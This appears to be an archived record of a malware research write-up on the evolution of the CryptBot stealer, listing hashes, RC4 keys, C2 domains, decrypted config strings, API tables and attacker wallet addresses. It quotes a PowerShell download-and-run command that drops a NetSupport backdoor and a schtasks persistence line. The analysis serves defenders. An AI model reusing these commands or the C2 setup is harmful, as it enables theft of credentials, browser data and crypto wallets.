{
	"id": "5eb8b5f2-5f58-4a5f-8da0-3c127c63d6a4",
	"created_at": "2026-04-06T00:16:15.336761Z",
	"updated_at": "2026-04-10T13:12:47.26194Z",
	"deleted_at": null,
	"sha1_hash": "a668bb0cc56e6dcf3daa524e054f40b8d3885e8d",
	"title": "CryptBot Evolution",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 126293,
	"plain_text": "CryptBot Evolution\r\nPublished: 2024-12-06 · Archived: 2026-04-05 16:24:23 UTC\r\nOverview\r\nCryptBot has evolved significantly over the past two years. Starting out as a simple stealer compiled with msvc\r\nand and containing an XOR encrypted config, the developers have released multiple iterations of the bot\r\nattempting to distence themselves from the orignal stealer. The modern version is almost unrecognizable, it is\r\ncompiled with minGw, makes heavy use of an obfuscator, and uses RC4 to protect its configuration, however,\r\nonce the layers are stripped away, this is still the same simple stealer underneath.\r\nReferences\r\nThere's Something About CryptBot: Yet Another Silly Stealer (YASS)\r\nVersion 1 (November 2023)\r\nOALABS CryptBot V1 Analysis\r\nConfig encrypted with xor\r\nmsvc compiled\r\nPacked 7ccda59528c0151bc9f11b7f25f8291d99bcf541488c009ef14e2a104e6f0c5d\r\nUnpacked cfbecf45c083efffff6d3000972a66cddb2f26d5c1845a697351b132e65049e0\r\nPlaintext strings in binary used for C2 comms.\r\nUID:\r\nUserName:\r\nComputerName:\r\nDateTime:\r\nUserAgent:\r\nKeyboard Languages:\r\nDisplay Resolution:\r\nCPU:\r\nRAM:\r\nGPU:\r\nisGodMod: yes\r\nisGodMod: no\r\nisAdmin: yes\r\nisAdmin: no\r\nInstalled software:\r\nConfig\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 1 of 23\n\nExternalDownload: http://ovapfa05.top/unfele.dat\r\nC2: http://erniku42.top/gate.php;\r\nVersion 2 (Timeline unknown)\r\nConfig encrypted with rc4.\r\nmsvc compiled\r\nNot packed 34dcc780d2a2357c52019d87a0720802a92f358d15320247c80cc21060fb6f57\r\nrc4 key oSabnN\r\nAccording to Intezer\r\nThe stealer also has the ability to drop the NetSupport Client as a backdoor for the infected machine.\r\nThe client is deployed via a PowerShell command and script.\r\n/c powershell -NoP -NonI -ExecutionPolicy Bypass -Command \"$Resp = Invoke-WebRequest -Uri 'https://b\r\nPlaintext strings in binary used for C2 comms.\r\nUserName (ComputerName):\r\nData (Time):\r\nOS:\r\nKeyboard Languages:\r\nCPU:\r\nRAM:\r\nGPU:\r\nDisplay Resolution:\r\nInstalled Apps:\r\nDecrypted config (ascii and wide version of the same table)\r\ngceight8vt.top\r\n\\Winodukec\r\noSabnN\r\n\\ServiceData\r\n\\ServiceData\\Clip.jpg\r\n\\ServiceData\\Clip.exe\r\n/c schtasks /create /tn \\Service\\Data /tr \"\"\"\"%wS\"\"\" \"\"\"%wS\"\"\"\" /st 00:01 /du 9800:59 /sc once /ri 1 /f\r\nGET\r\nPOST\r\n/index.php\r\n/gate.php\r\n/zip.php\r\n/upload.php\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 2 of 23\n\ncurl/8.0.1\r\nNULL\r\nNULL\r\nNULL\r\nContent-Length: %lu\r\nHTTP\r\nHTTPS\r\n\"encrypted_key\":\"\r\nDPAPI\r\nDISPLAY\r\n$CREEN.JPEG\r\nScreenShot.jpeg\r\nMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; rv:11.0) like Gecko\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36\r\nApps\r\nBrowsers\r\nFiles\r\nWallets\r\nUserID.txt\r\nDebug.txt\r\nEnd.txt\r\nlog.txt\r\nUser's Computer Information.txt\r\nDesktop\r\nOthers\r\nNULL\r\nAn error occurred while starting the application (0xc000007b). To exit the application, click OK.\r\nSystem Error\r\nNULL\r\nComSpec\r\nLocalAppData\r\nAppData\r\nTemp\r\nUserProfile\r\nNULL\r\nNULL\r\nshaverma.site\r\nNULL\r\nkernel32.dll\r\nntdll.dll\r\nuser32.dll\r\nshlwapi.dll\r\nmsvcrt.dll\r\nshell32.dll\r\nwininet.dll\r\nwinhttp.dll\r\nws2_32.dll\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 3 of 23\n\nurlmon.dll\r\ncrypt32.dll\r\ngdi32.dll\r\ngdiplus.dll\r\nole32.dll\r\ncabinet.dll\r\nadvpack.dll\r\nadvapi32.dll\r\nrstrtmgr.dll\r\nwinsqlite3.dll\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nGetModuleHandleA\r\nGetModuleHandleW\r\nGetModuleHandleExA\r\nGetModuleHandleExW\r\nLoadLibraryA\r\nLoadLibraryW\r\nLoadLibraryExA\r\nLoadLibraryExW\r\nGetProcAddress\r\nFreeLibrary\r\nNULL\r\nMessageBoxA\r\nMessageBoxW\r\nNULL\r\nCreateThread\r\nCreateRemoteThread\r\nCreateRemoteThreadEx\r\nOpenThread\r\nOpenProcess\r\nGetThreadId\r\nGetProcessId\r\nCreateMutexA\r\nCreateMutexW\r\nReleaseMutex\r\nWaitForSingleObject\r\nCreateProcessA\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 4 of 23\n\nCreateProcessW\r\nShellExecuteA\r\nShellExecuteW\r\nWinExec\r\nNULL\r\nHeapCreate\r\nGetProcessHeap\r\nHeapAlloc\r\nHeapReAlloc\r\nHeapSize\r\nHeapFree\r\nNULL\r\nVirtualAlloc\r\nVirtualAllocEx\r\nVirtualFree\r\nVirtualFreeEx\r\nVirtualProtect\r\nVirtualProtectEx\r\nNULL\r\nLocalAlloc\r\nLocalFree\r\nNULL\r\ncalloc\r\nmalloc\r\nrealloc\r\nfree\r\nNULL\r\nCreateFileA\r\nCreateFileW\r\nReadFile\r\nWriteFile\r\nSetFilePointer\r\nSetFilePointerEx\r\nGetFileAttributesA\r\nGetFileAttributesW\r\nGetFileAttributesExA\r\nGetFileAttributesExW\r\nGetFileSize\r\nGetFileSizeEx\r\nCreateFileMappingA\r\nCreateFileMappingW\r\nMapViewOfFile\r\nUnmapViewOfFile\r\nCloseHandle\r\nNULL\r\nSHGetFolderPathA\r\nSHGetFolderPathW\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 5 of 23\n\nGetEnvironmentVariableA\r\nGetEnvironmentVariableW\r\nExpandEnvironmentStringsA\r\nExpandEnvironmentStringsW\r\nGetModuleFileNameA\r\nGetModuleFileNameW\r\nGetModuleFileNameExA\r\nGetModuleFileNameExW\r\nGetCurrentDirectoryA\r\nGetCurrentDirectoryW\r\nGetSystemDirectoryA\r\nGetSystemDirectoryW\r\nGetSystemWow64DirectoryA\r\nGetSystemWow64DirectoryW\r\nGetTempPathA\r\nGetTempPathW\r\nGetTempFileNameA\r\nGetTempFileNameW\r\nNULL\r\nURLDownloadToFileA\r\nURLDownloadToFileW\r\nURLOpenBlockingStreamA\r\nURLOpenBlockingStreamW\r\nCoInitialize\r\nCoUninitialize\r\nNULL\r\nWinHttpCrackUrl\r\nWinHttpOpen\r\nWinHttpConnect\r\nWinHttpOpenRequest\r\nWinHttpAddRequestHeaders\r\nWinHttpSendRequest\r\nWinHttpReceiveResponse\r\nWinHttpReadData\r\nWinHttpReadDataEx\r\nWinHttpQueryHeaders\r\nWinHttpQueryOption\r\nWinHttpCloseHandle\r\nNULL\r\nInternetCrackUrlA\r\nInternetOpenUrlA\r\nInternetOpenA\r\nInternetConnectA\r\nHttpOpenRequestA\r\nHttpSendRequestA\r\nHttpQueryInfoA\r\nInternetReadFile\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 6 of 23\n\nInternetReadFileExA\r\nInternetCloseHandle\r\nNULL\r\nInternetCrackUrlW\r\nInternetOpenUrlW\r\nInternetOpenW\r\nInternetConnectW\r\nHttpOpenRequestW\r\nHttpSendRequestW\r\nHttpQueryInfoW\r\nInternetReadFile\r\nInternetReadFileExW\r\nInternetCloseHandle\r\nNULL\r\nWSAStartup\r\nsocket\r\nhtons\r\ninet_addr\r\nbind\r\nlisten\r\naccept\r\nrecv\r\nrecvfrom\r\nsend\r\nclosesocket\r\nWSAGetLastError\r\nWSACleanup\r\nNULL\r\nFindFirstFileNameA\r\nFindFirstFileNameW\r\nFindNextFileNameA\r\nFindNextFileNameW\r\nFindFirstFileA\r\nFindFirstFileW\r\nFindFirstFileExA\r\nFindFirstFileExW\r\nFindNextFileA\r\nFindNextFileW\r\nFindClose\r\nNULL\r\nRegOpenKeyExA\r\nRegOpenKeyExW\r\nRegQueryInfoKeyA\r\nRegQueryInfoKeyW\r\nRegEnumKeyExA\r\nRegEnumKeyExW\r\nRegQueryValueExA\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 7 of 23\n\nRegQueryValueExW\r\nRegCloseKey\r\nNULL\r\nwnsprintfA\r\nwnsprintfW\r\nStrStrIA\r\nStrStrIW\r\nPathIsDirectoryA\r\nPathIsDirectoryW\r\nPathFileExistsA\r\nPathFileExistsW\r\nSHAnsiToUnicode\r\nSHUnicodeToAnsi\r\nNULL\r\nwsprintfA\r\nwsprintfW\r\n_snprintf\r\n_snwprintf\r\nswprintf\r\nsprintf\r\n_swprintf\r\nsprintf_s\r\nswprintf_s\r\n_snwprintf_s\r\n_vscprintf\r\nvsnprintf\r\n_vscwprintf\r\nvswprintf\r\nNULL\r\nWideCharToMultiByte\r\nMultiByteToWideChar\r\nGetComputerNameA\r\nGetComputerNameW\r\nGetUserNameA\r\nGetUserNameW\r\nCopyFileA\r\nCopyFileW\r\nCopyFileExA\r\nCopyFileExW\r\nDeleteFileA\r\nDeleteFileW\r\nMoveFileA\r\nMoveFileW\r\nMoveFileExA\r\nMoveFileExW\r\nCreateDirectoryA\r\nCreateDirectoryW\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 8 of 23\n\nRemoveDirectoryA\r\nRemoveDirectoryW\r\nNULL\r\nEnumDisplaySettingsA\r\nEnumDisplaySettingsW\r\nCreateDCA\r\nCreateDCW\r\nCreateCompatibleDC\r\nCreateCompatibleBitmap\r\nSelectObject\r\nBitBlt\r\nGetDeviceCaps\r\nStretchBlt\r\nGetObjectA\r\nGetObjectW\r\nGetDIBits\r\nReleaseDC\r\nDeleteDC\r\nNULL\r\nGdiplusStartup\r\nGdipGetImageEncoders\r\nGdipGetImageEncodersSize\r\nGdipLoadImageFromFile\r\nGdipCreateBitmapFromHBITMAP\r\nGdipSaveImageToFile\r\nGdipSaveImageToStream\r\nGetBitmapBits\r\nDeleteObject\r\nGdiplusShutdown\r\nNULL\r\nSHCreateMemStream\r\nCreateStreamOnHGlobal\r\nSaveImageToStream\r\nIStream_Size\r\nIStream_Reset\r\nIStream_Read\r\nNULL\r\nExtractFilesA\r\nExtractFilesW\r\nExtract\r\nFCICreate\r\nFCIAddFile\r\nFCIFlushFolder\r\nFCIFlushCabinet\r\nFCIDestroy\r\nNULL\r\nCryptUnprotectData\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 9 of 23\n\nGetTickCount\r\nGetTickCount64\r\nQueryPerformanceCounter\r\nCreateToolhelp32Snapshot\r\nProcess32FirstA\r\nProcess32FirstW\r\nProcess32NextA\r\nProcess32NextW\r\nGetLocaleInfoA\r\nGetLocaleInfoW\r\nGetLogicalDriveStringsA\r\nGetLogicalDriveStringsW\r\nGetDriveTypeA\r\nGetDriveTypeW\r\nGetVolumeInformationA\r\nGetVolumeInformationW\r\nGetDiskFreeSpaceExA\r\nGetDiskFreeSpaceExW\r\nReadConsoleA\r\nReadConsoleW\r\nWriteConsoleA\r\nWriteConsoleW\r\nGetCommandLineA\r\nGetCommandLineW\r\nGetConsoleMode\r\nprintf\r\nwprintf\r\natoi\r\n_wtoi\r\nFileTimeToSystemTime\r\nGetFileInformationByHandle\r\nIsBadReadPtr\r\nSystemTimeToFileTime\r\nGetTimeZoneInformation\r\nGetLocalTime\r\nGlobalMemoryStatusEx\r\nDuplicateHandle\r\nGetCurrentProcess\r\nGetCurrentThread\r\nGetUserDefaultLocaleName\r\nGetSystemMetrics\r\nGetSystemInfo\r\nGetNativeSystemInfo\r\nIsWow64Process\r\nIsWow64Process2\r\nGetKeyboardLayoutList\r\nRtlGetVersion\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 10 of 23\n\nGetLastError\r\nSetErrorMode\r\nabs\r\nclock\r\nOpenProcess\r\nTerminateProcess\r\nRmStartSession\r\nRmRegisterResources\r\nRmGetList\r\nRmEndSession\r\nstrtod\r\nisspace\r\nSleep\r\nSleepEx\r\nGetExitCodeThread\r\nExitThread\r\nExitProcess\r\nFileTimeToDosDateTime\r\nWinHttpSetOption\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 11 of 23\n\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nVersion 3.1 (Timeline unknown)\r\nConfig encrypted with rc4 (dynamic)\r\ngcc compiled Linker: GNU linker ld (GNU Binutils)(2.40)GUI32\r\ncontains a zipped binary and dll\r\nff10143803f39c6c08b2fbe846d990b92c6d1b71e27f89bca69ab9331945b14a\r\nrc4 key LkgwUi\r\ncontains embeded clipboard crypto stealer\r\ncomplete crypto stealer 059d39e5ea384d50c448696da393e9396b883627e5ad02bdd77b66371ba34f7d\r\ncorrupted crypto stealer 7a5a330e626f73b5c4bfa9aeb29a19429cbdd66dd7968b190586c14cbee8a7c9\r\nCrypto addresses\r\n0xAd32513c4eC05473BD61E6B52eDfd9b6E1Aa5cb8\r\naddr1q8jpzpnwlwu4a6kjyjxgvezzm37u9t84fz959e0fzyxm2s0yzyrxa7aetm4dyfyvsejy9hrac2k02jytgtj7jygdk4qs3eg0ge\r\nbc1qyyuf4jnjl0h0cak8x6jr2j4tg8kdqtvpmuy4ry\r\n17f9LD7vcwLAQCKLndeSw4mHog4TMYiQUR\r\n3KqeRSDxs4TcK9B2DiymiH43ecc7wYwyNW\r\n1XFCPNp73Ri94yuzn1Uw7UuBjc\r\nLZXNaN8NvdGLzCS5CxRRELkam3CPENdJnb\r\nTDkA9uBQPpstFPZEwh4avMdea5Himx2a7T\r\nrsUa6Xs5fiqvp6EHV4urFE8Sk7QHHVwWez\r\nterra1xkkzmqhgzlezxdn2qserytms7ng3zxcw8639yx\r\nKPET9oKko2NGKgzojp7AcAreukPDoNZifHMSDsVjQGt\r\n\"Anal\" build artifacts that dox the build env\r\n/home/anal/bot/zip_include/zip.c\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 12 of 23\n\n/home/anal/bot/zip_include/miniz.h\r\nC2 http://tventyvx20pn.top/v1/upload.php\r\nPlaintext stirngs in binary for c2\r\nCPU:\r\nRAM:\r\nInstalled Apps:\r\nDisplay Resolution:\r\nGPU:\r\nOS:\r\nUserName (ComputerName):\r\nKeyboard Languages:\r\nData (Time):\r\nDecrypted config strings\r\ntventyvx20pn.top\r\n\\nuSONyiIRP\r\nLkgwUi\r\n\\ServiceData\r\n\\ServiceData\\Clip.au3\r\n\\ServiceData\\Clip.exe\r\n/c schtasks /create /tn \\Service\\Data /tr \"\"\"\"%wS\"\"\" \"\"\"%wS\"\"\"\" /st 00:01 /du 9800:59 /sc once /ri 1 /f\r\nGET\r\nPOST\r\n/index.php\r\n/gate.php\r\n/zip.php\r\n/v1/upload.php\r\ncurl/8.0.1\r\nNULL\r\nNULL\r\nNULL\r\nContent-Length: %lu\r\nHTTP\r\nHTTPS\r\n\"encrypted_key\":\"\r\nDPAPI\r\nDISPLAY\r\n$CREEN.JPEG\r\nScreenShot.jpeg\r\nMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; rv:11.0) like Gecko\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36\r\nApps\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 13 of 23\n\nBrowsers\r\nFiles\r\nWallets\r\nUserID.txt\r\nDebug.txt\r\nEnd.txt\r\nlog.txt\r\nUser's Computer Information.txt\r\nDesktop\r\nOthers\r\nNULL\r\nAn error occurred while starting the application (0xc000007b). To exit the application, click OK.\r\nSystem Error\r\nNULL\r\nComSpec\r\nLocalAppData\r\nAppData\r\nTemp\r\nUserProfile\r\nNULL\r\nNULL\r\nanalforeverlovyu.top\r\nNULL\r\nkernel32.dll\r\nntdll.dll\r\nuser32.dll\r\nshlwapi.dll\r\nmsvcrt.dll\r\nshell32.dll\r\nwininet.dll\r\nwinhttp.dll\r\nws2_32.dll\r\nurlmon.dll\r\ncrypt32.dll\r\ngdi32.dll\r\ngdiplus.dll\r\nole32.dll\r\ncabinet.dll\r\nadvpack.dll\r\nadvapi32.dll\r\nrstrtmgr.dll\r\nwinsqlite3.dll\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 14 of 23\n\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nGetModuleHandleA\r\nGetModuleHandleW\r\nGetModuleHandleExA\r\nGetModuleHandleExW\r\nLoadLibraryA\r\nLoadLibraryW\r\nLoadLibraryExA\r\nLoadLibraryExW\r\nGetProcAddress\r\nFreeLibrary\r\nNULL\r\nMessageBoxA\r\nMessageBoxW\r\nNULL\r\nCreateThread\r\nCreateRemoteThread\r\nCreateRemoteThreadEx\r\nOpenThread\r\nOpenProcess\r\nGetThreadId\r\nGetProcessId\r\nCreateMutexA\r\nCreateMutexW\r\nReleaseMutex\r\nWaitForSingleObject\r\nCreateProcessA\r\nCreateProcessW\r\nShellExecuteA\r\nShellExecuteW\r\nWinExec\r\nNULL\r\nHeapCreate\r\nGetProcessHeap\r\nHeapAlloc\r\nHeapReAlloc\r\nHeapSize\r\nHeapFree\r\nNULL\r\nVirtualAlloc\r\nVirtualAllocEx\r\nVirtualFree\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 15 of 23\n\nVirtualFreeEx\r\nVirtualProtect\r\nVirtualProtectEx\r\nNULL\r\nLocalAlloc\r\nLocalFree\r\nNULL\r\ncalloc\r\nmalloc\r\nrealloc\r\nfree\r\nNULL\r\nCreateFileA\r\nCreateFileW\r\nReadFile\r\nWriteFile\r\nSetFilePointer\r\nSetFilePointerEx\r\nGetFileAttributesA\r\nGetFileAttributesW\r\nGetFileAttributesExA\r\nGetFileAttributesExW\r\nGetFileSize\r\nGetFileSizeEx\r\nCreateFileMappingA\r\nCreateFileMappingW\r\nMapViewOfFile\r\nUnmapViewOfFile\r\nCloseHandle\r\nNULL\r\nSHGetFolderPathA\r\nSHGetFolderPathW\r\nGetEnvironmentVariableA\r\nGetEnvironmentVariableW\r\nExpandEnvironmentStringsA\r\nExpandEnvironmentStringsW\r\nGetModuleFileNameA\r\nGetModuleFileNameW\r\nGetModuleFileNameExA\r\nGetModuleFileNameExW\r\nGetCurrentDirectoryA\r\nGetCurrentDirectoryW\r\nGetSystemDirectoryA\r\nGetSystemDirectoryW\r\nGetSystemWow64DirectoryA\r\nGetSystemWow64DirectoryW\r\nGetTempPathA\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 16 of 23\n\nGetTempPathW\r\nGetTempFileNameA\r\nGetTempFileNameW\r\nNULL\r\nURLDownloadToFileA\r\nURLDownloadToFileW\r\nURLOpenBlockingStreamA\r\nURLOpenBlockingStreamW\r\nCoInitialize\r\nCoUninitialize\r\nNULL\r\nWinHttpCrackUrl\r\nWinHttpOpen\r\nWinHttpConnect\r\nWinHttpOpenRequest\r\nWinHttpAddRequestHeaders\r\nWinHttpSendRequest\r\nWinHttpReceiveResponse\r\nWinHttpReadData\r\nWinHttpReadDataEx\r\nWinHttpQueryHeaders\r\nWinHttpQueryOption\r\nWinHttpCloseHandle\r\nNULL\r\nInternetCrackUrlA\r\nInternetOpenUrlA\r\nInternetOpenA\r\nInternetConnectA\r\nHttpOpenRequestA\r\nHttpSendRequestA\r\nHttpQueryInfoA\r\nInternetReadFile\r\nInternetReadFileExA\r\nInternetCloseHandle\r\nNULL\r\nInternetCrackUrlW\r\nInternetOpenUrlW\r\nInternetOpenW\r\nInternetConnectW\r\nHttpOpenRequestW\r\nHttpSendRequestW\r\nHttpQueryInfoW\r\nInternetReadFile\r\nInternetReadFileExW\r\nInternetCloseHandle\r\nNULL\r\nWSAStartup\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 17 of 23\n\nsocket\r\nhtons\r\ninet_addr\r\nbind\r\nlisten\r\naccept\r\nrecv\r\nrecvfrom\r\nsend\r\nclosesocket\r\nWSAGetLastError\r\nWSACleanup\r\nNULL\r\nFindFirstFileNameA\r\nFindFirstFileNameW\r\nFindNextFileNameA\r\nFindNextFileNameW\r\nFindFirstFileA\r\nFindFirstFileW\r\nFindFirstFileExA\r\nFindFirstFileExW\r\nFindNextFileA\r\nFindNextFileW\r\nFindClose\r\nNULL\r\nRegOpenKeyExA\r\nRegOpenKeyExW\r\nRegQueryInfoKeyA\r\nRegQueryInfoKeyW\r\nRegEnumKeyExA\r\nRegEnumKeyExW\r\nRegQueryValueExA\r\nRegQueryValueExW\r\nRegCloseKey\r\nNULL\r\nwnsprintfA\r\nwnsprintfW\r\nStrStrIA\r\nStrStrIW\r\nPathIsDirectoryA\r\nPathIsDirectoryW\r\nPathFileExistsA\r\nPathFileExistsW\r\nSHAnsiToUnicode\r\nSHUnicodeToAnsi\r\nNULL\r\nwsprintfA\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 18 of 23\n\nwsprintfW\r\n_snprintf\r\n_snwprintf\r\nswprintf\r\nsprintf\r\n_swprintf\r\nsprintf_s\r\nswprintf_s\r\n_snwprintf_s\r\n_vscprintf\r\nvsnprintf\r\n_vscwprintf\r\nvswprintf\r\nNULL\r\nWideCharToMultiByte\r\nMultiByteToWideChar\r\nGetComputerNameA\r\nGetComputerNameW\r\nGetUserNameA\r\nGetUserNameW\r\nCopyFileA\r\nCopyFileW\r\nCopyFileExA\r\nCopyFileExW\r\nDeleteFileA\r\nDeleteFileW\r\nMoveFileA\r\nMoveFileW\r\nMoveFileExA\r\nMoveFileExW\r\nCreateDirectoryA\r\nCreateDirectoryW\r\nRemoveDirectoryA\r\nRemoveDirectoryW\r\nNULL\r\nEnumDisplaySettingsA\r\nEnumDisplaySettingsW\r\nCreateDCA\r\nCreateDCW\r\nCreateCompatibleDC\r\nCreateCompatibleBitmap\r\nSelectObject\r\nBitBlt\r\nGetDeviceCaps\r\nStretchBlt\r\nGetObjectA\r\nGetObjectW\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 19 of 23\n\nGetDIBits\r\nReleaseDC\r\nDeleteDC\r\nNULL\r\nGdiplusStartup\r\nGdipGetImageEncoders\r\nGdipGetImageEncodersSize\r\nGdipLoadImageFromFile\r\nGdipCreateBitmapFromHBITMAP\r\nGdipSaveImageToFile\r\nGdipSaveImageToStream\r\nGetBitmapBits\r\nDeleteObject\r\nGdiplusShutdown\r\nNULL\r\nSHCreateMemStream\r\nCreateStreamOnHGlobal\r\nSaveImageToStream\r\nIStream_Size\r\nIStream_Reset\r\nIStream_Read\r\nNULL\r\nExtractFilesA\r\nExtractFilesW\r\nExtract\r\nFCICreate\r\nFCIAddFile\r\nFCIFlushFolder\r\nFCIFlushCabinet\r\nFCIDestroy\r\nNULL\r\nCryptUnprotectData\r\nGetTickCount\r\nGetTickCount64\r\nQueryPerformanceCounter\r\nCreateToolhelp32Snapshot\r\nProcess32FirstA\r\nProcess32FirstW\r\nProcess32NextA\r\nProcess32NextW\r\nGetLocaleInfoA\r\nGetLocaleInfoW\r\nGetLogicalDriveStringsA\r\nGetLogicalDriveStringsW\r\nGetDriveTypeA\r\nGetDriveTypeW\r\nGetVolumeInformationA\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 20 of 23\n\nGetVolumeInformationW\r\nGetDiskFreeSpaceExA\r\nGetDiskFreeSpaceExW\r\nReadConsoleA\r\nReadConsoleW\r\nWriteConsoleA\r\nWriteConsoleW\r\nGetCommandLineA\r\nGetCommandLineW\r\nGetConsoleMode\r\nprintf\r\nwprintf\r\natoi\r\n_wtoi\r\nFileTimeToSystemTime\r\nGetFileInformationByHandle\r\nIsBadReadPtr\r\nSystemTimeToFileTime\r\nGetTimeZoneInformation\r\nGetLocalTime\r\nGlobalMemoryStatusEx\r\nDuplicateHandle\r\nGetCurrentProcess\r\nGetCurrentThread\r\nGetUserDefaultLocaleName\r\nGetSystemMetrics\r\nGetSystemInfo\r\nGetNativeSystemInfo\r\nIsWow64Process\r\nIsWow64Process2\r\nGetKeyboardLayoutList\r\nRtlGetVersion\r\nGetLastError\r\nSetErrorMode\r\nabs\r\nclock\r\nOpenProcess\r\nTerminateProcess\r\nRmStartSession\r\nRmRegisterResources\r\nRmGetList\r\nRmEndSession\r\nstrtod\r\nisspace\r\nSleep\r\nSleepEx\r\nGetExitCodeThread\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 21 of 23\n\nExitThread\r\nExitProcess\r\nFileTimeToDosDateTime\r\nWinHttpSetOption\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nNULL\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 22 of 23\n\nNULL\r\nNULL\r\nVersion 3.2 (Timeline unknown)\r\ngcc compiled\r\ndownloads the binary\r\ne7a83ddae3eec8ce624fc138e1dddb7f3ff5c5c9f20db11f60e22f489bdcc947\r\nSource: https://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nhttps://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)\r\nPage 23 of 23",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.openanalysis.net/cryptbot/botnet/yara/config/2024/12/06/cryptbot2.html#Version-3.2-(Timeline-unknown)"
	],
	"report_names": [
		"cryptbot2.html#Version-3.2-(Timeline-unknown)"
	],
	"threat_actors": [],
	"ts_created_at": 1775434575,
	"ts_updated_at": 1775826767,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a668bb0cc56e6dcf3daa524e054f40b8d3885e8d.pdf",
		"text": "https://archive.orkl.eu/a668bb0cc56e6dcf3daa524e054f40b8d3885e8d.txt",
		"img": "https://archive.orkl.eu/a668bb0cc56e6dcf3daa524e054f40b8d3885e8d.jpg"
	}
}